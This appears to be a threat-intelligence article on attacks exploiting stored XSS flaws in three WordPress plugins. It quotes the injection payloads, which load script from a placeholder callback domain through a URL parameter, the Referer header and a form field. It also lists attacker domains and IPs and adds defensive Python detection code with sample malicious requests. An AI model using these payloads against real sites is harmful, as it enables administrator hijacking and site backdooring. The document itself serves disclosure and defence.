In recent cyberattacks, hackers are actively exploiting stored cross-site scripting (XSS) vulnerabilities in various WordPress plugins.
According to a Fastly report, these vulnerabilities, tracked as CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000, stem from inadequate input sanitization and output escaping, which allows attackers to inject malicious scripts.
The WP Statistics plugin (version 14.5 and earlier) is vulnerable to stored cross-site scripting via the URL search parameter.
utm_id="><script src="https://{CALLBACK_DOMAIN}/"></script>
This vulnerability allows unauthenticated attackers to inject arbitrary web scripts via the URL search parameter.
These scripts are executed whenever a user accesses an injected page.
The attacker repeatedly sends requests carrying this payload in the “utm_id” parameter so that it shows up among the most visited pages.
The WP Meta SEO plugin (version 4.5.12 and earlier) is susceptible to stored cross-site scripting attacks via the Referer HTTP header.
Referer: <script src="https://{CALLBACK_DOMAIN}/"></script>
The attacker sends this payload to a target site, particularly to a page that generates a 404 response.
The WP Meta SEO plugin inserts this unsanitized header into the database to track redirects.
When an administrator loads the 404 & Redirects page, the script pulls obfuscated JavaScript from the callback domain and executes it in the victim’s browser.
WordPress’s LiteSpeed Cache plugin (version 5.7.0.1 and earlier) is vulnerable to stored cross-site scripting through the ‘nameservers’ and ‘_msg’ parameters.
result[_msg]=<script src="https://{CALLBACK_DOMAIN}/"></script>
The XSS payload is disguised as an admin notification, so it is triggered when an administrator accesses any backend page; the malicious script then executes with the administrator’s credentials and is used for subsequent malicious actions.
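The three payloads above share one shape: a `<script src=...>` tag placed where only plain text belongs (a query parameter, the Referer header, or a form field). The following detection routine, added here as an example and not code from the report, checks one request at a time for that shape in the parameters and header the report names. The request dicts, the `callback.example` host and the request paths are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# A <script ... src=...> tag has no legitimate use inside utm_id, Referer,
# nameservers or _msg values, so its presence is the detection signal.
SCRIPT_SRC = re.compile(r"<\s*script\b[^>]*\bsrc\s*=", re.IGNORECASE)

# Parameter names the report identifies as stored-XSS sinks, labelled by plugin.
WATCHED_PARAMS = {
    "utm_id": "WP Statistics utm_id",
    "nameservers": "LiteSpeed Cache nameservers",
    "_msg": "LiteSpeed Cache _msg",
    "result[_msg]": "LiteSpeed Cache _msg",
}

# Constructed sample requests (not captured traffic); callback.example stands in
# for the attacker's {CALLBACK_DOMAIN}.
SAMPLE_REQUESTS = [
    {"method": "GET",
     "path": "/?utm_id=%22%3E%3Cscript%20src%3D%22https%3A%2F%2Fcallback.example%2F%22%3E%3C%2Fscript%3E",
     "headers": {"Referer": "https://legit.example/"}, "body": ""},
    {"method": "GET", "path": "/this-page-does-not-exist",
     "headers": {"Referer": '<script src="https://callback.example/"></script>'}, "body": ""},
    {"method": "POST", "path": "/hypothetical-plugin-endpoint", "headers": {},
     "body": "result%5B_msg%5D=%3Cscript%20src%3D%22https%3A%2F%2Fcallback.example%2F%22%3E%3C%2Fscript%3E"},
    {"method": "GET", "path": "/?utm_id=spring_sale",
     "headers": {"Referer": "https://legit.example/blog"}, "body": ""},
]


def _params(encoded):
    """Percent-decode a query string or form body into {name: [values]}."""
    return parse_qs(encoded, keep_blank_values=True)


def inspect_request(req):
    """Return a list of (rule, evidence) findings for one request dict."""
    findings = []
    query = urlsplit(req["path"]).query
    sources = (("query", _params(query)), ("body", _params(req.get("body", ""))))
    for source, params in sources:
        for name, values in params.items():
            for value in values:
                if SCRIPT_SRC.search(value):
                    rule = WATCHED_PARAMS.get(name, "script tag in %s parameter %s" % (source, name))
                    findings.append((rule, value))
    # Header names are matched case-insensitively; Referer is the WP Meta SEO sink.
    for header, value in req.get("headers", {}).items():
        if SCRIPT_SRC.search(value):
            rule = "WP Meta SEO Referer" if header.lower() == "referer" else "script tag in header %s" % header
            findings.append((rule, value))
    return findings


def scan(requests):
    """Return {index: findings} for every request that produced a finding."""
    results = {}
    for i, req in enumerate(requests):
        findings = inspect_request(req)
        if findings:
            results[i] = findings
    return results


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS).items():
        for rule, evidence in findings:
            print("request %d: %s -> %r" % (index, rule, evidence))
```

Percent-decoding before matching matters: the first and third samples arrive fully URL-encoded and would slip past a regex run over the raw request line. The fourth request, a normal `utm_id` value, produces no finding, which is the false-positive check a rule like this needs before it goes into a WAF or SIEM.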
The contents of the malicious JavaScript perform the following actions:
The malicious PHP performs the following:
<script src="https://{TRACKING_DOMAIN}/"></script>
hxxp://ur.mystiqueapi[.]com/?ur=<$_SERVER['HTTP_HOST']>
CVE-2024-2194
The domain media.cdnstaticjs[.]com is linked to the exploitation of CVE-2024-2194.
We have observed attacks from 17 different IP addresses targeting this vulnerability, primarily originating from AS202425 (IP Volume Inc.) and AS210848 (Telkom Internet LTD), with a concentration of attacks coming from the Netherlands.
CVE-2023-6961
The domain idc.cloudiync[.]com is linked to the exploitation of CVE-2023-6961.
To date, over 5 billion requests have attempted to exploit this vulnerability from a single IP address, which originates from the autonomous system AS202425 (IP Volume Inc.).
Additionally, since May 16th, we have observed media.cdnstaticjs[.]com being used in attack payloads targeting this vulnerability. This domain is also used in attacks targeting CVE-2024-2194.
CVE-2023-40000
The domains cloud.cdndynamic[.]com, go.kcloudinc[.]com, and cdn.mediajsdelivery[.]com are associated with the exploitation of CVE-2023-40000.
The last observed attack using the domain cdn.mediajsdelivery[.]com was on April 15th. Since then, we have only seen cloud.cdndynamic[.]com and go.kcloudinc[.]com being used in attacks targeting this vulnerability.
Unlike the previous two vulnerabilities, the attacks exploiting CVE-2023-40000 are more distributed across different IP addresses and autonomous systems (AS).
We have observed attacks from 1664 distinct IP addresses, primarily originating from AS210848 (Telkom Internet LTD) and AS202425 (IP Volume Inc.).
A significant concentration of attacks came from the Netherlands.
The domain assets.scontentflow[.]com was registered shortly after CVE-2023-6961 was publicly released, and this is the primary domain being written into infected sites in payloads coming from idc.cloudiync[.]com.
Our searches found few web pages containing this payload, indicating limited infection success with it so far.
The domain cache.cloudswiftcdn[.]com was registered before any of the three CVEs was publicly disclosed.
The payloads observed referencing this domain are structured similarly to the other observed payloads but attempt to backdoor over 40 additional themes.
There are over 3000 pages containing this script, according to searches on PublicWWW.
This, combined with the earlier registration time, might indicate a longer period of use or infection time.
Domains observed in the campaign:
media.cdnstaticjs[.]com
cloud.cdndynamic[.]com
idc.cloudiync[.]com
cdn.mediajsdelivery[.]com
go.kcloudinc[.]com
assets.scontentflow[.]com
cache.cloudswiftcdn[.]com
IP addresses observed in the campaign:
80.82.76[.]214
31.43.191[.]220
94.102.51[.]144
94.102.51[.]95
91.223.82[.]150
185.7.33[.]129
101.99.75[.]178
94.242.61[.]217
80.82.78[.]133
111.90.150[.]154
103.155.93[.]120
185.100.87[.]144
185.162.130[.]23
101.99.75[.]215
111.90.150[.]123
103.155.93[.]244
185.209.162[.]247
179.43.172[.]148
185.159.82[.]103
185.247.226[.]37
185.165.169[.]62
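The report's domains are listed in defanged form (`[.]`, `hxxp`), and the infection outcome it describes is a `<script src=...>` tag written into a site's pages. As an added example, not code from the report, the routine below refangs that list and scans a page's HTML for script tags whose host matches one of the domains. The HTML sample and the `cdnjs.example` host in it are constructed for the demonstration; the indicator list is copied from the report.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Indicators as published in the report, still defanged.
DEFANGED_IOCS = """
media.cdnstaticjs[.]com
cloud.cdndynamic[.]com
idc.cloudiync[.]com
cdn.mediajsdelivery[.]com
go.kcloudinc[.]com
assets.scontentflow[.]com
cache.cloudswiftcdn[.]com
hxxp://ur.mystiqueapi[.]com/
"""

# Constructed page: one legitimate script (cdnjs.example is a placeholder)
# and two injected ones, the second using a protocol-relative URL.
SAMPLE_HTML = """
<html><head>
<script src="https://cdnjs.example/jquery.min.js"></script>
<script src="https://media.cdnstaticjs.com/"></script>
</head><body>
<p>Hello</p>
<script src="//cloud.cdndynamic.com/x.js"></script>
</body></html>
"""


def refang(token):
    """Turn a defanged indicator ('[.]', 'hxxp://') back into a plain host name."""
    token = token.strip().replace("[.]", ".")
    token = re.sub(r"^hxxp", "http", token, flags=re.IGNORECASE)
    if "://" in token:
        token = urlsplit(token).hostname or ""
    return token.lower()


def load_iocs(text):
    """Parse a defanged indicator list into a set of lowercase host names."""
    return {refang(line) for line in text.splitlines() if line.strip()}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def find_injected_scripts(html, iocs):
    """Return (host, src) for each script whose host is, or is under, an IoC domain."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    hits = []
    for src in parser.srcs:
        # urlsplit handles absolute and protocol-relative URLs alike.
        host = (urlsplit(src).hostname or "").lower()
        if host and any(host == d or host.endswith("." + d) for d in iocs):
            hits.append((host, src))
    return hits


if __name__ == "__main__":
    for host, src in find_injected_scripts(SAMPLE_HTML, load_iocs(DEFANGED_IOCS)):
        print("injected script from %s: %s" % (host, src))
```

Matching on the parsed host rather than a substring of the raw HTML avoids both misses (protocol-relative or attribute-reordered tags) and false hits (the domain appearing in visible text). Run against post content and theme files, this also covers the `<script src="https://{TRACKING_DOMAIN}/">` tag the report describes being written into infected pages.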